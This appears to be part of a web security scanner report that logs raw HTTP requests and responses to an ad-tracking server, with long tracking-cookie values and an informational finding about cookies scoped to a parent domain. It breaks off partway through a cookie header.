GET /r/beacon?b2=dLIuOGfOzkZylUaPcW45J1NM3fA_ZnR2d4cPbuMElFEvYxI1ZImxMCpPyY8hh_IBrR-1pVaDIemsGHXtH-_-EA&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=jPCRKqrj87qIJxtlMQWAeEChT2n2hjlNeUtfI18EVvCY481wEkFtGX7HudJA1SwJI3d8wh-8F3M_mXcdjcS-VSm0eLaoIKxUGXp9LrfCkU9_tnfsaUjBl08t5WPRK0VURVro0VaYJSFBW8ummLzmaIKBmXLKaNQC_VstFH2_fFpKQkzhSzd0OA7TdBU9TjZEJGXtc03lRAW7XQ4DISJNToVALrQWz2MTLkxqGX2dkixiiuCgw-RUBPrhyXIonq-JO1Bp39fVI570M3anNYXEeUs1tPAJ0EW-1VMg8V7a5wldzyMGDGIyTnWkwLiiAh9MnoUAhDiUl9Tegk8e5loBtCPfUfWmFvuHa7ho64SbyNRCdB0gGLuWZn2SFARzFJPESwQcmlx05sJTCiLTcgCP4At5Nkw2i8ci7zeXoamyfIkXLuYA-Dhd_NCbS18tUNtNvkWLzJ6aRrpGreADONKQFjqdAq7HLak39li3oOzBb2LeZa7kJWdY4s3_LxRnaveh3zRKhr_QKICSCDvtEvXL5bc_DW9fRIIhGqjaZpBQKPuvEW4pltifd2UFOGJBUm-HNrIvCCgnCtouI-Uiugr_XDqnokT_uSlOVd9om3L3_Zyu-SvKhx26d2lgxRL2g7NnpnufmqwPr0iX6TO_QvAchAci1X1kdq4IOav-VGBUnPFENQMte8mJeFRkxXb-wFJ5RVro0VaYJSFBW8ummLzmaNGHuZ00Doye8JlLv5mr5PFKQkzhSzd0OA7TdBU9TjZEAKZ1XvhQcWRwSquFFdyqk27PUbblbYukMk_ukxgrNp1iiuCgw-RUBPrhyXIonq-JrVUsFGMjIsjG4wG8JccNY0s1tPAJ0EW-1VMg8V7a5wn-FB-cNjGuev6cKfXYBTnN0_vou2SdMt8u86ZsS3JrqiPfUfWmFvuHa7ho64SbyNQHZddyBwQ_bn6DeUZJIktJSwQcmlx05sJTCiLTcgCP4PkIlx5s8TLQpLlToa_KmjIJFHg-6pvIHl5Jd-boptVivkWLzJ6aRrpGreADONKQFi1uWhCbBLDkUUl3GB-cia7eZa7kJWdY4s3_LxRnavehkKIyZUcKn4gaSbbrzqSrcgqUnZs_qTc4J1uECWvW6WbTYemUMl4rww0Ahse7Jfbjh8YLajdpYA5oCRPEinWDNzqnokT_uSlOVd9om3L3_Zxs-1IWnYFHuATbbO_y4X0qnTAQXKSKZxRRHNLIhO3aIaSqEypMHifOKCbgAvu2-dYixi2mthDBgkkh8E1XVaeYRVro0VaYJSFBW8ummLzmaFVfdYHK1Q73JpHXN0tZ5ChKQkzhSzd0OA7TdBU9TjZE1kmOSSok1OTXuW9iz2m4nL5yE_6sd6seuxofVhtsYmBiiuCgw-RUBPrhyXIonq-JQurUvISATSSNOXvmuhMCV2KK4KDD5FQE-uHJciier4klqT8ZcugfJqC9EwK5ktSgSzW08AnQRb7VUyDxXtrnCWozIMOsCXwOUoX3GwmeVVAxi8wzskQPsxtBtldyMSwagsPhD5djythOHSHCTJOhXN8kothY4cGzuNEdryxzqqlLBByaXHTmwlMKItNyAI_gA5nIMgtWWpg9SGtTLubci8mKqUVNtCEf11hjerFm783rueT8thuReMGYM-G8N401JqMaNEKucbt7MzwWQQWU-d5lruQlZ1jizf8vFGdq96EVQq5esqu6oyUY2zlzU2xLXWhOIfbu6nlVGazQ3C00oYS8zm8KaUf2JPX_XkHFplCbza_ABfjL7BKJWmajZwI8OqeiRP-5KU5V32ibcvf9nKIPnlMyG4VsL_dpoB-0W9QGvLE_z_KyAskRioKbfxN_786M9IuI8BYnDc-poA-MUnfZxmx8Z1na_56NWnVp5lVFWujRVpglIUFby6aYvOZo-guTtl2FC1HRuw7-BKiPgkpCTOFLN3Q4DtN0FT1ONkRfEwEV-i4hDFcRNIjoo2NgkPVO08UdjTRS6iKsNti_SGKK4KDD5FQE-uHJciier4kPyz-Wufncl9LyPoL9B1QKSzW08AnQRb7VUyDxXtrnCYqBIOxmA7cQDFoERRAumqjQS-E5nxed_shBlbXuObLDI99R9aYW-4druGjrhJvI1JH00lIUEmEEA_OFUDNzutxLBByaXHTmwlMKItNyAI_g_3bTqCYCGbHkXEVzPY_01mXeNri_O61lm1ldtHVrpR7ZPRGnTyb4BtK8arS2F9YZe4UCz5TMA5hwrPrqery6C_wkRIQCoel50LHttKKxvj2T-81UMTQPlYAknpDpTSLEO5HiathQKE8omxVc53FpCRoxDfNmYDnxg0EvFrwRe3pCS4dcida2s-s0XQ4z8fCn0-2F-mOoQpGwjdYnRQCARZtq_gHnWf9fXfe0G5ZJVnGpH8LKKIm0TYD_Luo27v_Fd79BPBBGXhysRhWpW1cyG4cyxzjZGmjTf1aqiATmAjS8PU8Ims583iYmtl6BnonGOZ_I42pI-l997CutSY5UTnU6t7Hj0VsEozVWpOhdHdFbLfPqvGJUWoA-TUxLJGtuWy3z6rxiVFqAPk1MSyRrblst8-q8YlRagD5NTEska26shJ8rvIZ2pEIvj7vJYr_-ftZVQVVx5oyA1oNVdb0c2RvgUG90xsnNOLDcsndxj6Hfhp4cgON-zdligsRs6_1T34aeHIDjfs3ZYoLEbOv9U9-GnhyA437N2WKCxGzr_VPG0U7eaD3Hbtxwd0g2BAEnxtFO3mg9x27ccHdINgQBJ8qENCoPz5YPQkhGm2FiUj3LFz3e1wa31-DKI83R83jg3QTL9zDrzTFlXoiMqjuSWt0Ey_cw680xZV6IjKo7klpI3j9xuCx21BIxBdXN5YAR9AhrAwqavcLA2O6a4z37Lsij7qsRPo1Q9IcnQsYBZ5nZ4Yik6WYEG4S1yIWi95cAawB_d25XmA1YnkFKy4M4_IsLKOVSlL41zvQ6wOKAHEjq7nKInFrgoG_62xoiLBKT6u5yiJxa4KBv-tsaIiwSk-rucoicWuCgb_rbGiIsEpOvDsfne5seg63D4x3flsyZrw7H53ubHoOtw-Md35bMma8Ox-d7mx6DrcPjHd-WzJlOSrp14Y383TLXFJ1T7HeQDdh5RodnqZ0dgGASOf1Fng3YeUaHZ6mdHYBgEjn9RZ6k3CneyeK26bqX2BslrNlwDg97pn0xq8XVtSFY17J1rA4Pe6Z9MavF1bUhWNeydawOD3umfTGrxdW1IVjXsnWsZmDwoJlEZXfDBjNrKbkdHGZg8KCZRGV3wwYzaym5HRxmYPCgmURld8MGM2spuR0cbb0sPsXWgw_x9D6jnx5LK_2BhDosUowXxXmwB90G1tj9gYQ6LFKMF8V5sAfdBtbY_YGEOixSjBfFebAH3QbW2GhE7gFloT4X513bbUoowJpoRO4BZaE-F-dd221KKMCaaETuAWWhPhfnXdttSijAmjoFfr6E7AtWKXcAv7zPgNhKraltt_znEUtPzey_YSNRSq2pbbf85xFLT83sv2EjUUqtqW23_OcRS0_N7L9hI1Fz-QUXxY9m0RT2v_0PtAEz3vMJW6Nolrhqx2yRbBnwHeM8DMgjvm5t97BtYytOx4Rqhj3O8p-XR3nA6DvXKpTl; fc=NPwnTj55SxablmgxgOU6YvTAau0fxQm9Ss2FVtOc0fRwe2fiMiJstcorldPAQEWsjtR00WuVUesotFeF8b0iqzTwskhjzr5X5fLnW2Y1L8oWeSZAoSqfzCTWGJqSVzUxwmWj6rOwJQbNe1FGkQ72Mr3ZyRv0KSWu8UtGn86vdZZ2Bxw8hDOLkguYqml5zW-MINBiIQ09VuaB6H4kNZ3jvWDXo_Ub5NvFSqNxsTqhNOEJzdGEYQUbYRsENlG1EkxlHr-vpMpIww2oeMaNqJcAGNVCVYgScgvT-7lnf3tWEtoI26ZIhO_EYD2Jv5etTb7nPXORZ_ihz3v_EDqUfBGd38kaFp7wmgHwSln4BB0aAU-Y-fE6mCrmAAKxJpNINZh0gYrE3U6bhGdZv_0Ofvauqo02tkR5MgBK5U8r1oXGHyKLM2r82BMAlsOE4kKakojRElg7FxL2FmmNWsvuLk3EV1Ob1kR0cv3Vim-wWYu2PuOaPtJF5zGBev3l88f3V44c; pf=imLa8Y9K7y9JWjvDp9rzLXdg786oafP5T-2J8P9-MbRqAdtWEIdLx553uOXwyk_d7lMV6ku5x6Fs62Dm_QelJC3HNez-Z8pMdla1M14yZ1aXhaLn0WGDkLMH4cxWtxtJnQ3ziRBzpEB5dtK5nAeBUmYbbn7O8vmG9T4ZvTBxZ-fkUczbVJT5Cai6PVkpiYM250Hn9REtTxKxE8sY6J3ypnin2DltV7TDetw9hjspxXZhD8p41r9TwMfEMg-G1XemtTB2tozm01YLbZIiUMvmqnqcRK5l5t99h9o1nyRJGB_k59seAzgg1-n2fcjLvpOMi9tA_b87Jqn_e3gK2wczGx_CWj995ZG4J9ayZG8Azab13_ic6bm3qPlYluqL2y0jaU-Oqt1gdom4zJIFfDwZ9PMXsV2RPLlXKhVOkCzWSAMHy8NkV9GlxOD5jcadlcpoFV-_N4_TQoIGyiXOJHiskWx1ZATf6jr6V7CCyVFok1rG6pyhUqm2FHzEiDJ6sf-pacXWwno-sBBfZi85NtW5Qt-_BHDFm96AL-Hlvz6iB4BqpqgoK--2Z8dYtNlLNE0_IPCGGg4JuduY91z0-G9PFEs00MFyErnctvH2BT73d3_FZBD7b-KShsGHFtw-PJccEMxwAG8SoEVS9m9Zd2vmWErUUgLCw4NxIwxNfjDRkuTL2j5Yg93F_QOtFzYyWOePChv1i2naEiRm-G40oRJBGTBpVCc0qMQ7XSXeQvsWsjFHiMSxf4LuiqRb7JIEpKg8kby9cY_1mRgRy-7Zp8tzhfOiqJ0pMkyWUtj3tCfqb_tGZRzNBjxRhmI6dM4mbZKOYU4-nV0UYeEGUxF1S_oHu4hFkzr5r4tc43qm6cSueuRO2hVcsSqb840lbAIGS9ubZxGaNUCyMdwNgf2avKHVNnolOOu7jj76mTVAdA_mdYfmHtPNZuqI_jxiXxEOs5H0vlfIlKbmfHqHUcP5b-IIns1zek1KJ0W2qXBTetRtqOYNCGSsyjP4AXt3T9RPBVkJDNnxwnTaHhSt6_M966_yDGRntkal431Er-D6EvQQXSzw07Q7-ZTvu6ltuMBngQyhlUXNT1Hb5nCH2u9H8JYL2vqi7ZcubYPjdCiTEvC6ixvxWnBAvvN4YHBYs623Zfp7mYinN8F-xomiNBADxpAVRXj30kPclrBAUX47luAB61FeciHDtDUZA6oDA9lgECWxePb1qgK2wydMqKon7gU_K8C3sxgZqLnqGwdljDWk8V-5saTK0J9MhEtW2SZi442SAJJiCcWe8XmAo-ZeIFD11aDlRV7nM6V6_zFKpP7wlLYQPKIschJVNwDZdXQ9qmKL_Qbi_JfgEHW4reZkqoXAIHtX_b9gyna0u7aW5BDNIqsWhukbMM8brSoTtnUG56p5TJB44WFzdjkM-mROp9OOL7FDQ7cHkGLYBuqZ3lgWaipiAFXhGx2dqcch-VuzoEikRXiOR4xaxbvDpaqAiEb8VhvKcFx-ovh4Sl88FoBqgf0tyxN9W-kw0R4q9C5CmY2JUjJXnRD7WzNJZ_sCBAgpM1TWvCRlVZFXXZnqNPukYr_L3KLsKcRyxoRdaMovUBfTNEPRSKFgtbcbx8BqX90ZQQcpEfWqJMVmEBPEAIGejpPCFWKz3O59OPx58buvJ_uvNLcUoXM2ObJkBpZIBDJKm2ziC3HJIl0BWgLsB3Xb9sspub1VzehZ-dnjQrUAX1RWz23DJ4AN2p3Bkps3nmT_CyZOWO0K6AmyoJJ0WVqwfHJmkvMMecgZzynLsGgRc_i10bzP3aegk4VhMUbe1DPDoRajStMsbCQClj0a4aNFYQ33AhPyEf_pRhJLMk6r38S9EXL7rx5ntmq24iXH1baYIQ5WA9IExVRwqhQKkb2ecnJ-2UOQj0PVB__QK20iFxmMrBi_Ozk9p2lUUv6L37oAr_AV6d2dHRLCHQNMiRthyWEMiVlxcMdEeKLokMX7jcq64dIsZNbiFzVInJ14TCwCQ9fqReykA8qBRaCLn3AdbjtskBuPk60M0N683DQsE4ZC-hxMORC22isekOI2V75sPw5QLpTHbDx3qmiChRuhkT71jvR1w1cjNDo5Itf_BvoKeVF3ZR9-1s7QiDoMPUY-ZVqhnCeQMjDTZrbWEsRIvXQWcM2EqCJfHKFgH6ShjUTMi6Fy8HuTX3hHZqIyshrEm0-qlU6GLKu8GfLpkN0bDQNM4p86wye9uBqQI4_fI7zC0JJ2DuRXGxP-2g9_CgYuY8pN_VrecGDh6UwTrru9GLmwxbidN1AUdQybKB4VyjEokVAfrO6zFP7ekqOUhJzASYimudaJc-nqwrLqeBidwfS-yH1nGi3UeGqKb9R2O8_f7i8ovAE8EZ8c3EpZGfdvY3YmYKNPM3iO16JJWQBvkviQa82CG4NkuHuK5hHF8F4pZHDyRRzEoRhIsHjaFVUhglHsoi-_gue4Y9GYFWcPlXqN1LcUW2PklnchprXEhv3r7HtHIEvOa8bUpKMjK8lg77zJlCabEdFr8zLsnvY_jhe-w8LS7NnrSfPrT7_ys5OYzXfKqxN9PqlPQO7yAyIRqyycyKA8i0F3zIMbv5tUub_jys2KG-DoXTNzLTlHYmH8wMN_undN9fZc-pI0Ny4hubjOBUf2DQSm9Ohj3B7jgP9CCqG8Wt-ubVX90wI71XdOFbmuO_nu7xzWg1owdmgiD4haU31wETkVUs2IUBSWSwU9HuGqutvFVd-RPEMlRmI-tk5XQOBLE3hkIaiREQLK5qM9EX44AOJlvs8DYm-_z8wtr-sIKH6L02PQc77v8w4KeUWdpWld1cOt5B9y5dzZtTu3JqKGLAN1pzcD0dPfCuBK65VIPkK5kWZct35sO1Zn7pXWDz9pp4ib7xIdhf9zRg7pMNE_CJ40sHgFesrKS-sIOtZ0uWaFVuInERcUbOl0hZVWfZ4IPC39oh4ISFoEomPNyVVtSZY1RAo6Ssw0gNhdaAh0ubUxGmkN2fgVgehhyd0pky1b6ARNsIvyharCLLEFwpnlzXrhrzzYYv8tbnjLz1Zdsb_zZj1IfqS_aLZsRx-RLssOEi8Ic52I1SwSEzv1L7Xgy2Eldwn0osGTLllLrxdLGKvBbatPkttpJfAXFMB_81ZZqVp19l6yq--kytbvLV02MMBRF8QbYmkHZ9XZAHAsEZLsmJUb3ppXhtS9nRt7KX5Xvit0JJ8VmH7pEBcCAAwb_dsSSirzOYOWSpt9tKo6CdsoHgH6aru4Y4C1Oo_U7A4BsmBGEA7E6lGoeN4cYQLBhIGU78mY0O1B84kcRbagcEY3bvKO4WENO-4Aup8ydwoW1LAK5lzDCZf66Ro0bevR-FWOxJFZXHpkSB-wiy2euPF1s93pcsDAmXOMvRijJwI3i6Kr-KRd8-6tGKt3Z8Sx3Gwu4SNfNZ4Dc9CPpihH8V5KiSx-wwNBb6P5; rv=1; uid=4325897289836481830; rrs=3%7C6%7C9%7C12%7C1002%7C1005%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C18%7C2%7C5%7C1001%7C1004%7C1007; rds=15156%7C15153%7C15156%7C15156%7C15161%7C15153%7C15149%7C15146%7C15151%7C15156%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Mon, 02-Jan-2012 15:39:04 GMT; Path=/
Set-Cookie: pf=jYpfHiwkL0q9Fc9kSjyuBBgn_wnb0_8qr_BqadU9rG7QZMj4YW4gjixh7pNwS2UBTEDZiJ73QG1Fncs-ZvtnGF1FGvBOgdBbEZX-YnBGLm7gM3D9ilPTjzMPHfvm2ZJRnQ3ziRBzpEB5dtK5nAeBUmYbbn7O8vmG9T4ZvTBxZ-fkUczbVJT5Cai6PVkpiYM250Hn9REtTxKxE8sY6J3ypnin2DltV7TDetw9hjspxXZhD8p41r9TwMfEMg-G1XemtTB2tozm01YLbZIiUMvmqnqcRK5l5t99h9o1nyRJGB-FVxq_hTarUuNMxmlOGv8i7uQNESU0ZB56kdO0OzIJXwIs_FraXwaqx9H3t0t_K8ypqvHTLNec123RZuM5_NQFc2SDKyJaL5qarBv4Mwfu6hbDkZ7-COXcc7J638-N2-nGmnSXYlumivx65OLyIDjkiclTN27E7VAjyP94ylXV2THc-FaZMQYHJfzm7Wd4vCeBVksj6qG_vGOBRszlEhTBHJJkbCwqlvtJ4YMajskqFiOxya5mnbA7S3fs-iJhVbcnz2gJQYfShI1TCMqbtLiB20vA45lRWnNPOHTjbHe0UEpEgz7rg3mBmvvpNOjjPm1ShVQJNOkuyKXxjHeUbdb1vdEe_5ovSouJNB12j0ymtjbRa7aarVBYGbRDMIU6CnuHCuJ-pktYTsiyWrGNv7OuJsye64pN7BOura6aOSSI4b0Rt8phWSAaqD7MP1KznZpkTlhpXh4-TTR0ThSULn8x1UaE9wNorS3GYtjFZhcRVjJtfcYNkhzgDL3eMoWYNnYZqDKZRMvFd1ZKcUJuq_zhyyoX1Pm8pjzP3_QghQ9Mhio8jk9cro0gAwFF1DDFwTgH5PxTXVL6MoBnLB4b86CcB8cTKKUjKihGgM2TUJhZG3-h45YbzGndZUDHE2X88AvIcBSo3moUduDgWZjkDYofLI3QTC9S8KPN85sRP4COobdYXsT06PSNQWuuG0Xn65Z3TsjwnGp1987qUWPEQeKMZGxJcekloD_rTqVoMnmvyUxnoiuihCenkYB2EtVtlsCeyQt7jyEfnyFotaOujGmKeSahF2EZm46lAKLF003b0aLuJG6qbnKeGwdBvyJVdvGSPywaPWKJ5BRBfOF_6vvw0FtvmqU9JaAKw66loiImQTLzz78ETcLhQCLITMYwtftNww_XA-rRSdgEN76SA2KFbCG0h-75nZpxziOW1ekTf_IRDhOcOSKJofmwpZhjQmZKT3Nh_cPzwAkdpELNjsHGDgwfAOYMl-ze4C007tvDJ6VdfZ0Oh9nSGeaNSCn7BkNAtEibl5r00ChmOkCE37PQIS6dq7wPT-1B87w3eSIvWRK6JC2t1oeUqveL4vnLZ7v2BI8mOR_5Vtk4hl7LQbH47KHn9mApouFIrwoHgitvHAehUtrZB2pIKMrOd4ecGu_5Td_uxCtmy4XXdxPxi6IKIjh7TJldhJ1GEczWVD_bGDc5v-2kLO9WqTDY302oYnzhwqCcIDoCNscaj0YzBqlfTzIyDrkH8vxatsKDAXQ4Jtsl3_oK7x_ip5W7JjCcrLcd7TBTL-_O684O_LyajFvidwb0lwMpvI_qobXEf8vwpXx6CjgObJXPAwErnDdRiZXG6Rzjlrpvxx7MGKC7oc-DJnbgu8dTjdEu82cH1uuItohCE1GVLsDIM9OdE-Q70TxRIlHcKuOK0l22qglRvlRyVeDa5R_skBBpROqVdegphoCA2EMAYy34m3C8AxbQVXv2tLid0B5RDfv1jI7nqI1f-8CctWfpBr-abLfwawha_eevSu-BeNRGS6-l3e5LdUzjTr5IHUlZPEoPSUcuuHcGVq3GMZ6CGJzLxK1NMIN_YWa2WWtfKqGIbTsLzoX0-JPgHLZuqjGn3YuU0loBjwMsmJ7XoXxix2tpkkNV5h1NZXB331PWryy2AG1BPJuJLVT4zIbE77kZcMZssTCDF_zNzv-hOQROl4HLc4UEWkb-u9aQ2rlen_mi55lWZqga_d0hTj-SD3oxsmwzn6Nq55trU-j1GQDzb1_ZvVwhRx0Q_uptE48rH8XCjOJUjQpNRLtZUDvekFZYlXQhitDAZOk6GY0VvVV0mCTSvypWIKrmyCjnr_gKagRSe4UTtSCll_gcGWTDNHC7qecFGk6z3e4O0QjMPBVo19szbTqBQzKlRSAllb1lD1Roagx8HVZqckVirWevftR-aku-hH_QPd78uCldR6o9Qveax8GXpS-aKypm31G_2IGt-C8CPV-k7sgwePfDaD07bFLHwbqeTRWrco6_yM2p6Eot3ZwbE8FNSMSRIUsVwczLLGyq-r3M1YwftiV7Mf5QNKakiimAbPOjWExPrbATLtIx3O0c7l-xfe6kPje8Lja2G_-zUipKgOcNMCj-oHgdiHJqq2uIgWnKHornuDOeLaiUkHIWVvckwkpCJBC2lm-u9i2rrm29_ZDe5dliakw6C2Rj8twiLlfzlikzpR7JfAp40cJcV6GlW0tIfGplg51pTREVDGmHH4AODXGdnK9TWlENpzw35TNdxfAxeUs1cPEOi64rainP0SCUkAmOLbuWn7tumbrHggoOTL0WyCGh3thvCqRtyaVRZz-2-3jDxWUSFOnuPF3ocmPNwA_bOdm7YVJUp4jOEdBZiYsXssmmvAyBz0cS2i2Tg9SBfWFvM_sO8OKD15OvQrtoSZMz5FTL-BuuozwA6N992I4-6hay9R2qPdJa0ze6SLrcfsCWB4Ky3zErqDyKQ9H0wl5_pELpIMT-1qNVdptv-2EVPdJHgZb0fdvbb_D05T4qw5NQ4IrYDRR6LV3elq1du1FqUseWHsqUVdnaZ2p6yXCUtvl4kPfb3QvIQhlltw8I1JpUh0NabZ58BmDwzPN5xltYK_LIcmdq_cpCxj7gQ2WlhFEkoKakhmHHWFkCePG_lq0jHRCZqo4u7okLdFJqi-23qryL4RN3Z0_aFQqDJg0rCBPD3aZqwLxsqDIrP0omCCN4boCegtfrjelXIeOuxrabXhN352MSihMc3-CVcb_kL5lOT9YcyoeJCg59Ijq8T2zgbVOU6zwBc9BcCnSWHFJw_RNB4fezftLML9d5dfvImsTPPvytRq-SoKYxwTHeA0JV-k-xaXuxkj_GEZSFgKdvBKHx9YsruAWjGFxZI0LubOY8fcDAh6xXzWCLVyQcJ-4oTSkYea1NH6xrxdYAaCV1D2k5am92malOiIupL4cMEfCOY7PzeBIuEFG_TjYOgum33GKCIuS7h__v7R45kyBgr7GCpwTTxWPWsVXGEu3LV_WOrXIlPfB_scXK7chTLmYhurC2Xmi93xEyKCpBoulsldLgoWwnRjkFUAbIECT6iggql6xRUe762UGNEynlJ5s-S_H9UP9RUUV02QidOFo-W0MGae-aRTNY2Bw09vXCoTf8EnEVDK1AK-L1; Domain=.turn.com; Expires=Mon, 02-Jan-2012 15:39:04 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Wed, 06 Jul 2011 15:39:03 GMT

GIF89a.............!.......,...........D..;

9.40. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/du/id/L21rdC8xL21jaHBpZC80/rnd/999?nocache=1754&1=999 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://p.brilig.com/contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=2723&action=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=jPCRKqrj87qIJxtlMQWAeEChT2n2hjlNeUtfI18EVvCY481wEkFtGX7HudJA1SwJI3d8wh-8F3M_mXcdjcS-VSm0eLaoIKxUGXp9LrfCkU9_tnfsaUjBl08t5WPRK0VURVro0VaYJSFBW8ummLzmaIKBmXLKaNQC_VstFH2_fFpKQkzhSzd0OA7TdBU9TjZEJGXtc03lRAW7XQ4DISJNToVALrQWz2MTLkxqGX2dkixiiuCgw-RUBPrhyXIonq-JO1Bp39fVI570M3anNYXEeUs1tPAJ0EW-1VMg8V7a5wldzyMGDGIyTnWkwLiiAh9MnoUAhDiUl9Tegk8e5loBtCPfUfWmFvuHa7ho64SbyNRCdB0gGLuWZn2SFARzFJPESwQcmlx05sJTCiLTcgCP4At5Nkw2i8ci7zeXoamyfIkXLuYA-Dhd_NCbS18tUNtNvkWLzJ6aRrpGreADONKQFjqdAq7HLak39li3oOzBb2LeZa7kJWdY4s3_LxRnaveh3zRKhr_QKICSCDvtEvXL5bc_DW9fRIIhGqjaZpBQKPuvEW4pltifd2UFOGJBUm-HNrIvCCgnCtouI-Uiugr_XDqnokT_uSlOVd9om3L3_Zyu-SvKhx26d2lgxRL2g7NnpnufmqwPr0iX6TO_QvAchAci1X1kdq4IOav-VGBUnPFENQMte8mJeFRkxXb-wFJ5RVro0VaYJSFBW8ummLzmaNGHuZ00Doye8JlLv5mr5PFKQkzhSzd0OA7TdBU9TjZEAKZ1XvhQcWRwSquFFdyqk27PUbblbYukMk_ukxgrNp1iiuCgw-RUBPrhyXIonq-JrVUsFGMjIsjG4wG8JccNY0s1tPAJ0EW-1VMg8V7a5wn-FB-cNjGuev6cKfXYBTnN0_vou2SdMt8u86ZsS3JrqiPfUfWmFvuHa7ho64SbyNQHZddyBwQ_bn6DeUZJIktJSwQcmlx05sJTCiLTcgCP4PkIlx5s8TLQpLlToa_KmjIJFHg-6pvIHl5Jd-boptVivkWLzJ6aRrpGreADONKQFi1uWhCbBLDkUUl3GB-cia7eZa7kJWdY4s3_LxRnavehkKIyZUcKn4gaSbbrzqSrcgqUnZs_qTc4J1uECWvW6WbTYemUMl4rww0Ahse7Jfbjh8YLajdpYA5oCRPEinWDNzqnokT_uSlOVd9om3L3_Zxs-1IWnYFHuATbbO_y4X0qnTAQXKSKZxRRHNLIhO3aIaSqEypMHifOKCbgAvu2-dYixi2mthDBgkkh8E1XVaeYRVro0VaYJSFBW8ummLzmaFVfdYHK1Q73JpHXN0tZ5ChKQkzhSzd0OA7TdBU9TjZE1kmOSSok1OTXuW9iz2m4nL5yE_6sd6seuxofVhtsYmBiiuCgw-RUBPrhyXIonq-JQurUvISATSSNOXvmuhMCV2KK4KDD5FQE-uHJciier4klqT8ZcugfJqC9EwK5ktSgSzW08AnQRb7VUyDxXtrnCWozIMOsCXwOUoX3GwmeVVAxi8wzskQPsxtBtldyMSwagsPhD5djythOHSHCTJOhXN8kothY4cGzuNEdryxzqqlLBByaXHTmwlMKItNyAI_gA5nIMgtWWpg9SGtTLubci8mKqUVNtCEf11hjerFm783rueT8thuReMGYM-G8N401JqMaNEKucbt7MzwWQQWU-d5lruQlZ1jizf8vFGdq96EVQq5esqu6oyUY2zlzU2xLXWhOIfbu6nlVGazQ3C00oYS8zm8KaUf2JPX_XkHFplCbza_ABfjL7BKJWmajZwI8OqeiRP-5KU5V32ibcvf9nKIPnlMyG4VsL_dpoB-0W9QGvLE_z_KyAskRioKbfxN_786M9IuI8BYnDc-poA-MUnfZxmx8Z1na_56NWnVp5lVFWujRVpglIUFby6aYvOZo-guTtl2FC1HRuw7-BKiPgkpCTOFLN3Q4DtN0FT1ONkRfEwEV-i4hDFcRNIjoo2NgkPVO08UdjTRS6iKsNti_SGKK4KDD5FQE-uHJciier4kPyz-Wufncl9LyPoL9B1QKSzW08AnQRb7VUyDxXtrnCYqBIOxmA7cQDFoERRAumqjQS-E5nxed_shBlbXuObLDI99R9aYW-4druGjrhJvI1JH00lIUEmEEA_OFUDNzutxLBByaXHTmwlMKItNyAI_g_3bTqCYCGbHkXEVzPY_01mXeNri_O61lm1ldtHVrpR7ZPRGnTyb4BtK8arS2F9YZe4UCz5TMA5hwrPrqery6C_wkRIQCoel50LHttKKxvj2T-81UMTQPlYAknpDpTSLEO5HiathQKE8omxVc53FpCRoxDfNmYDnxg0EvFrwRe3pCS4dcida2s-s0XQ4z8fCn0-2F-mOoQpGwjdYnRQCARZtq_gHnWf9fXfe0G5ZJVnGpH8LKKIm0TYD_Luo27v_Fd79BPBBGXhysRhWpW1cyG4cyxzjZGmjTf1aqiATmAjS8PU8Ims583iYmtl6BnonGOZ_I42pI-l997CutSY5UTnU6t7Hj0VsEozVWpOhdHdFbLfPqvGJUWoA-TUxLJGtuWy3z6rxiVFqAPk1MSyRrblst8-q8YlRagD5NTEska26shJ8rvIZ2pEIvj7vJYr_-ftZVQVVx5oyA1oNVdb0c2RvgUG90xsnNOLDcsndxj6Hfhp4cgON-zdligsRs6_1T34aeHIDjfs3ZYoLEbOv9U9-GnhyA437N2WKCxGzr_VPG0U7eaD3Hbtxwd0g2BAEnxtFO3mg9x27ccHdINgQBJ8qENCoPz5YPQkhGm2FiUj3LFz3e1wa31-DKI83R83jg3QTL9zDrzTFlXoiMqjuSWt0Ey_cw680xZV6IjKo7klpI3j9xuCx21BIxBdXN5YAR9AhrAwqavcLA2O6a4z37Lsij7qsRPo1Q9IcnQsYBZ5nZ4Yik6WYEG4S1yIWi95cAawB_d25XmA1YnkFKy4M4_IsLKOVSlL41zvQ6wOKAHEjq7nKInFrgoG_62xoiLBKT6u5yiJxa4KBv-tsaIiwSk-rucoicWuCgb_rbGiIsEpOvDsfne5seg63D4x3flsyZrw7H53ubHoOtw-Md35bMma8Ox-d7mx6DrcPjHd-WzJlOSrp14Y383TLXFJ1T7HeQDdh5RodnqZ0dgGASOf1Fng3YeUaHZ6mdHYBgEjn9RZ6k3CneyeK26bqX2BslrNlwDg97pn0xq8XVtSFY17J1rA4Pe6Z9MavF1bUhWNeydawOD3umfTGrxdW1IVjXsnWsZmDwoJlEZXfDBjNrKbkdHG